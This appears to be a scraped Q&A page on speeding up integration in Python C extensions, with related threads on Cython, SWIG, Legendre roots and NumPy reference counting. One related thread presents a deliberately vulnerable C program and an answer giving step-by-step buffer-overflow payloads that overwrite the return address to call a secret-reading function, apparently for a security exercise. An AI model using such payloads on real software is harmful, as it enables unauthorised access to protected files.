Equivalent of python lambda function for C (Python Extensions) - python

I'v written a Python extension module with C to speed up computation times. The first step is a 2D integration of a function f(x,y,k), which is very fast and allows me to integrate over y in [y1(x),y2(x)] and x in [a,b] whilst assigning a float to k. But I really need to integrate k over the range [c,d]. Currently, I'm doing something like this in Python
inner = lambda k: calc.kernel(l,k,ki)
I = quad(inner,c,d)[0]
where calc is my C-extension module and calc.kernel calls gauss2 to perform 2D integration. l and ki are just other variables. But with my data, quad still takes many hours to finish. I would like to do all calculations within the C-extension module, but I'm really stumped on how to implement this outer integral. Here is my C-code
#include <Python.h>
#include <math.h>
double A96[96]={ /* abscissas for 96-point Gauss quadrature */
};
double W96[96]={ /* weights for 96-point Gauss quadrature */
};
double Y1(double x){
return 0;
}
double Y2(double x){
return x;
}
double gauss1(double F(double),double a,double b)
{ /* 96-pt Gauss qaudrature integrates F(x) from a to b */
int i;
double cx,dx,q;
cx=(a+b)/2;
dx=(b-a)/2;
q=0;
for(i=0;i<48;i++)
q+=W96[i]*(F(cx-dx*A96[i])+F(cx+dx*A96[i]));
return(q*dx);
}
double gauss2(double F(double,double,int,double,double),double Y1(double),double Y2(double),double a,double b,int l,double k, double ki)
{/* 96x96-pt 2-D Gauss qaudrature integrates
F(x,y) from y=Y1(x) to Y2(x) and x=a to b */
int i,j,h;
double cx,cy,dx,dy,q,w,x,y1,y2;
cx=(a+b)/2;
dx=(b-a)/2;
q=0;
for(i=0;i<48;i++)
{
for(h=-1;h<=1;h+=2)
{
x=cx+h*dx*A96[i];
y1=Y1(x);
y2=Y2(x);
cy=(y1+y2)/2;
dy=(y2-y1)/2;
w=dy*W96[i];
for(j=0;j<48;j++)
q+=w*W96[j]*(F(x,cy-dy*A96[j],l,k,ki)+F(x,cy+dy*A96[j],l,k,ki));
}
}
return(q*dx);
}
double ps_fact(double z){
double M = 0.3;
return 3/2*(M*(1+z)*(1+z)*(1+z) + (1-M))*(M*(1+z)*(1+z)*(1+z) + (1-M))*(M*(1+z)*(1+z)*(1+z) + (1-M))/(1+z)/(1+z);
}
double drdz(double z){
double M = 0.3;
return 3000/sqrt(M*(1+z)*(1+z)*(1+z) + (1-M));
}
double rInt(double z){
double M = 0.3;
return 3000/sqrt(M*(1+z)*(1+z)*(1+z) + (1-M));
}
double kernel_func ( double y , double x, int l,double k, double ki) {
return ps_fact(y)*ki*rInt(x)*sqrt(M_PI/2/rInt(x))*jn(l+0.5,ki*rInt(x))*drdz(x)*(rInt(x)-rInt(y))/rInt(y)*sqrt(M_PI/2/rInt(y))*jn(l+0.5,k*rInt(y))*drdz(y);
}
static PyObject* calc(PyObject* self, PyObject* args)
{
int l;
double k, ki;
if (!PyArg_ParseTuple(args, "idd", &l, &k, &ki))
return NULL;
double res;
res = gauss2(kernel_func,Y1, Y2, 0,10,l, k, ki);
return Py_BuildValue("d", res);
}
static PyMethodDef CalcMethods[] = {
{"kernel", calc, METH_VARARGS, "Calculates kernel values."},
{NULL, NULL, 0, NULL}
};
PyMODINIT_FUNC initcalc(void){
(void) Py_InitModule("calc", CalcMethods);
A96 and W96 both contain the points for the Gaussian quadrature, so don't worry that they are empty here. I should add I don't take any credit for the functions gauss1 and gauss2.
EDIT: python code was wrong - edited now.

Maybe the source code for scipy integrate quad is a good place to start if you haven't looked there : https://github.com/scipy/scipy/blob/v0.17.0/scipy/integrate/quadpack.py#L45-L360
Looks like most of the work is already being done by native Fortran code, which is normally either as fast or faster than C/C++ code. You will be hard pressed to improve on that, unless you create/find a CUDA implementation.
You make the Fortran code multithreaded, if it's not already and the source is open. Lastly, you could make a threading dispatcher in C/Fortran (python doesn't support real threading because of the GIL) and just make your calls to quad parallel from one another atleast. Interfacing calc directly with Fortran quad would probably save you some decent overhead too.

Related

Buffer overflow attack, executing an uncalled function

So, I'm trying to exploit this program that has a buffer overflow vulnerability to get/return a secret behind a locked .txt (read_secret()).
vulnerable.c //no edits here
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
void read_secret() {
FILE *fptr = fopen("/task2/secret.txt", "r");
char secret[1024];
fscanf(fptr, "%512s", secret);
printf("Well done!\nThere you go, a wee reward: %s\n", secret);
exit(0);
}
int fib(int n)
{
if ( n == 0 )
return 0;
else if ( n == 1 )
return 1;
else
return ( fib(n-1) + fib(n-2) );
}
void vuln(char *name)
{
int n = 20;
char buf[1024];
int f[n];
int i;
for (i=0; i<n; i++) {
f[i] = fib(i);
}
strcpy(buf, name);
printf("Welcome %s!\n", buf);
for (i=0; i<20; i++) {
printf("By the way, the %dth Fibonacci number might be %d\n", i, f[i]);
}
}
int main(int argc, char *argv[])
{
if (argc < 2) {
printf("Tell me your names, tricksy hobbitses!\n");
return 0;
}
// printf("main function at %p\n", main);
// printf("read_secret function at %p\n", read_secret);
vuln(argv[1]);
return 0;
}
attack.c //to be edited
#!/usr/bin/env bash
/task2/vuln "$(python -c "print 'a' * 1026")"
I know I can cause a segfault if I print large enough string, but that doesn't get me anywhere. I'm trying to get the program to execute read_secret by overwriting the return address on the stack, and returns to the read_secret function, instead of back to main.
But I'm pretty stuck here. I know I would have to use GDB to get the address of the read_secret function, but I'm kinda confused. I know that I would have to replace the main() address with the read_secret function's address, but I'm not sure how.
Thanks
If you want to execute a function through a buffer overflow vulnerability you have to first identify the offset at which you can get a segfault. In your case I assume its 1026. The whole game is to overwrite the eip(what tells the program what to do next) and then add your own instruction.
To add your own instruction you need to know the address of said instruction and then so in gdb open your program and then type in:
x function name
Then copy the address. You then have to convert it to big or little endian format. I do it with the struct module in python.
import struct
struct.pack("<I", address) # for little endian for big endian its different
Then you have to add it to your input to the binary so something like:
python -c "print 'a' * 1026 + 'the_address'" | /task2/vuln
#on bash shell, not in script
If all of this doesnt work then just add a few more characters to your offset. There might be something you didnt see coming.
python -c "print 'a' * 1034 + 'the_address'" | /task2/vuln
Hope that answers your question.

set cython cdef extension array to zero

Is there a cython-ic way to set a cdef array to zeros. I have a function with the following signature:
cdef cget_values(double[:] cpc_x, double[:] cpc_y):
The function is called as follows:
cdef double cpc_x [16]
cdef double cpc_y [16]
cget_values(cpc_x, cpc_y)
Now the first thing I would like to do is set everything in these arrays to zeros. Currently, I am doing that with a for loop as:
for i in range(16):
cpc_x[i] = 0.0
cpc_y[i] = 0.0
I was wondering if this is a reasonable approach without much overhead. I call this function a lot and was wondering if there is a more elegant/faster way to do this in cython.
I assume, you are already using #cython.boundscheck(False), so there is not much you can do to improve on it performance-wise.
For the readability reasons I would use:
cpc_x[:]=0.0
cpc_y[:]=0.0
the cython would translate this to for-loops. An other additional advantage: even if #cython.boundscheck(False) isn't used, the resulting C-code will be nonetheless without boundchecks (__Pyx_RaiseBufferIndexError). Here is the resulting code for a[:]=0.0:
{
double __pyx_temp_scalar = 0.0;
{
Py_ssize_t __pyx_temp_extent_0 = __pyx_v_a.shape[0];
Py_ssize_t __pyx_temp_stride_0 = __pyx_v_a.strides[0];
char *__pyx_temp_pointer_0;
Py_ssize_t __pyx_temp_idx_0;
__pyx_temp_pointer_0 = __pyx_v_a.data;
for (__pyx_temp_idx_0 = 0; __pyx_temp_idx_0 < __pyx_temp_extent_0; __pyx_temp_idx_0++) {
*((double *) __pyx_temp_pointer_0) = __pyx_temp_scalar;
__pyx_temp_pointer_0 += __pyx_temp_stride_0;
}
}
}
What could improve the performance is to declare the the memory views to be continuous (i.e. double[::1] instead of double[:]. The resulting C code for a[:]=0.0 would be then:
{
double __pyx_temp_scalar = 0.0;
{
Py_ssize_t __pyx_temp_extent = __pyx_v_a.shape[0];
Py_ssize_t __pyx_temp_idx;
double *__pyx_temp_pointer = (double *) __pyx_v_a.data;
for (__pyx_temp_idx = 0; __pyx_temp_idx < __pyx_temp_extent; __pyx_temp_idx++) {
*((double *) __pyx_temp_pointer) = __pyx_temp_scalar;
__pyx_temp_pointer += 1;
}
}
}
As one can see, strides[0] is no longer used in the continuous version - strides[0]=1 is evaluated during the compilation and the resulting C-code can be better optimized (see for example here).
One could be tempted to get smart and to use low-level memset-function:
from libc.string cimport memset
memset(&cpc_x[0], 0, 16*sizeof(double))
However, for bigger arrays there will no difference compared to the usage of continuous memory view (i.e. double[::1], see here for example). There might be less overhead for smaller sizes, but I never cared enough to check.

SWIG c++ vector access in python

This may be a noob question but here it goes. I have wrapped a 3d vector into a python module using SWIG. Everything has compiled and I can import the module and perform actions with it. I can't seem to figure out how to access my vector in python to store and change values in it. How do I store and change my vector values in python. My code is below and was written to test if the algorithm stl works with SWIG. It does seem to work but I need to be able to put values into my vector with python.
header.h
#ifndef HEADER_H_INCLUDED
#define HEADER_H_INCLUDED
#include <vector>
using namespace std;
struct myStruct{
int vecd1, vecd2, vecd3;
vector<vector<vector<double> > >vec3d;
void vecSizer();
void deleteDuplicates();
double vecSize();
void run();
};
#endif // HEADER_H_INCLUDED
main.cpp
#include "header.h"
#include <vector>
#include <algorithm>
void myStruct::vecSizer()
{
vec3d.resize(vecd1);
for(int i = 0; i < vec3d.size(); i++)
{
vec3d[i].resize(vecd2);
for(int j = 0; j < vec3d[i].size(); j++)
{
vec3d[i][j].resize(vecd3);
}
}
}
void myStruct::deleteDuplicates()
{
vector<vector<vector<double> > >::iterator it;
sort(vec3d.begin(),vec3d.end());
it = unique(vec3d.begin(),vec3d.end());
vec3d.resize(distance(vec3d.begin(), it));
}
double myStruct::vecSize()
{
return vec3d.size();
}
void myStruct::run()
{
vecSizer();
deleteDuplicates();
vecSize();
}
from the terminal (Ubuntu)
import test #import the SWIG generated module
x = test.myStruct() #create an instance of myStruct
x.vecSize() #run vecSize() should be 0 since vector dimensions are not initialized
0.0
x.vec3d #see if vec3d exists and is of the correct type
<Swig Object of type 'vector< vector< vector< double > > > *' at 0x7fe6a483c8d0>
Thanks in advance!
It turns out that vectors are converted to immutable python objects when the wrapper/interface is generated. So in short you cannot modify wrapped c++ vectors from python.

Roots of Legendre Polynomials c++

I'm writing a program to find the roots of nth order Legendre Polynomials using c++; my code is attached below:
double* legRoots(int n)
{
double myRoots[n];
double x, dx, Pi = atan2(1,1)*4;
int iters = 0;
double tolerance = 1e-20;
double error = 10*tolerance;
int maxIterations = 1000;
for(int i = 1; i<=n; i++)
{
x = cos(Pi*(i-.25)/(n+.5));
do
{
dx -= legDir(n,x)/legDif(n,x);
x += dx;
iters += 1;
error = abs(dx);
} while (error>tolerance && iters<maxIterations);
myRoots[i-1] = x;
}
return myRoots;
}
Assuming the existence of functioning Legendre Polynomial and Legendre Polynomial derivative generating functions, which I do have but I thought that would make for unreadable walls of code text. This function is functioning in the sense that it's returning an array calculated values, but they're wildly off, outputting the following:
3.95253e-323
6.94492e-310
6.95268e-310
6.42285e-323
4.94066e-323
2.07355e-317
where an equivalent function I've written in Python gives the following:
[-0.90617985 -0.54064082 0. 0.54064082 0.90617985]
I was hoping another set of eyes could help me see what the issue in my C++ code is that's causing the values to be wildly off. I'm not doing anything different in my Python code that I'm doing in C++, so any help anyone could give on this is greatly appreciated, thanks. For reference, I'm mostly trying to emulate the method found on Rosetta code in regards to Gaussian Quadrature: http://rosettacode.org/wiki/Numerical_integration/Gauss-Legendre_Quadrature.
You are returning an address to a temporary variable in stack
{
double myRoots[n];
...
return myRoots; // Not a safe thing to do
}
I suggest changing your function definition to
void legRoots(int n, double *myRoots)
omitting the return statement, and defining myroots before calling the function
double myRoots[10];
legRoots(10, myRoots);
Option 2 would be to allocate myRoots dynamically with new or malloc.

Memory leak in Python extension when array is created with PyArray_SimpleNewFromData() and returned

I wrote a simple Python extension module to simulate a 3-bit analog-to-digital converter. It is supposed to accept a floating-point array as its input to return the same size array of output. The output actually consists of quantized input numbers. Here is my (simplified) module:
static PyObject *adc3(PyObject *self, PyObject *args) {
PyArrayObject *inArray = NULL, *outArray = NULL;
double *pinp = NULL, *pout = NULL;
npy_intp nelem;
int dims[1], i, j;
/* Get arguments: */
if (!PyArg_ParseTuple(args, "O:adc3", &inArray))
return NULL;
nelem = PyArray_DIM(inArray,0); /* size of the input array */
pout = (double *) malloc(nelem*sizeof(double));
pinp = (double *) PyArray_DATA(inArray);
/* ADC action */
for (i = 0; i < nelem; i++) {
if (pinp[i] >= -0.5) {
if (pinp[i] < 0.5) pout[i] = 0;
else if (pinp[i] < 1.5) pout[i] = 1;
else if (pinp[i] < 2.5) pout[i] = 2;
else if (pinp[i] < 3.5) pout[i] = 3;
else pout[i] = 4;
}
else {
if (pinp[i] >= -1.5) pout[i] = -1;
else if (pinp[i] >= -2.5) pout[i] = -2;
else if (pinp[i] >= -3.5) pout[i] = -3;
else pout[i] = -4;
}
}
dims[0] = nelem;
outArray = (PyArrayObject *)
PyArray_SimpleNewFromData(1, dims, NPY_DOUBLE, pout);
//Py_INCREF(outArray);
return PyArray_Return(outArray);
}
/* ==== methods table ====================== */
static PyMethodDef mwa_methods[] = {
{"adc", adc, METH_VARARGS, "n-bit Analog-to-Digital Converter (ADC)"},
{NULL, NULL, 0, NULL}
};
/* ==== Initialize ====================== */
PyMODINIT_FUNC initmwa() {
Py_InitModule("mwa", mwa_methods);
import_array(); // for NumPy
}
I expected that if reference counts were processed correctly, the Python garbage collection would (frequently enough) release the memory used by the output array if it has the same name and is used repeatedly. So I tested it on some dummy (but voluminous) data with this code:
for i in xrange(200):
a = rand(1000000)
b = mwa.adc3(a)
print i
Here the array named "b" is reused many times and its memory, borrowed by adc3() from the heap, is expected to be returned to the system. I used the gnome-system-monitor to check. Contrary to my expectations, the memory owned by python grew rapidly and could only be released by quitting the program (I use IPython).
For comparison, I tried the same procedure with the standard NumPy functions, zeros() and copy():
for i in xrange(1000):
a = np.zeros(10000000)
b = np.copy(a)
print i
As you can see, the latter code does not make any memory build-up.
I read many texts in the standard documentation and on the web, tried to use Py_INCREF(outArray) and not to use it. All in vain: the problem persisted.
However, I found the solution in http://wiki.scipy.org/Cookbook/C_Extensions/NumPy_arrays.
The author provides an extension program matsq() that creates an array and returns it. When I tried to use the calls suggested by the author:
outArray = (PyArrayObject *) PyArray_FromDims(nd,dims,NPY_DOUBLE);
pout = (double *) outArray->data;
instead of my
pout = (double *) malloc(nelem*sizeof(double));
outArray = (PyArrayObject *)
PyArray_SimpleNewFromData(1, dims, NPY_DOUBLE, pout);
/* no matter with or without Py_INCREF(outArray)) */
the memory leak gone! The program works properly now.
A question: can anybody explain why PyArray_SimpleNewFromData() does not provide the correct reference counting, while PyArray_FromDims() does?
Thank you very much.
ADDITION. I probably exceeded the room/time in comments, so I add to my comment to Alex here.
I tried to set the OWNDATA flag this way:
outArray->flags |= OWNDATA;
but I got "error: ‘OWNDATA’ undeclared".
The rest is in the comment. Thank you in advance.
SOLVED: The correct setting of the flag is
outArray->flags |= NPY_ARRAY_OWNDATA;
Now it works.
Alex, sorry.
The problem is not with PyArray_SimpleNewFromData which produces a properly refcounted PyObject*. Rather, it's with your malloc, assigned to pout then never freed.
As the docs at http://docs.scipy.org/doc/numpy/user/c-info.how-to-extend.html clearly state, documenting PyArray_SimpleNewFromData:
the ndarray will not own its data. When this ndarray is
deallocated, the pointer will not be freed.
...
If you want the
memory to be freed as soon as the ndarray is deallocated then simply
set the OWNDATA flag on the returned ndarray.
(my emphasis on the not). IOW, you're observing exactly the "will not be freed" behavior so clearly documented, and are not taking the step specifically recommended should you want to avoid said behavior.

Categories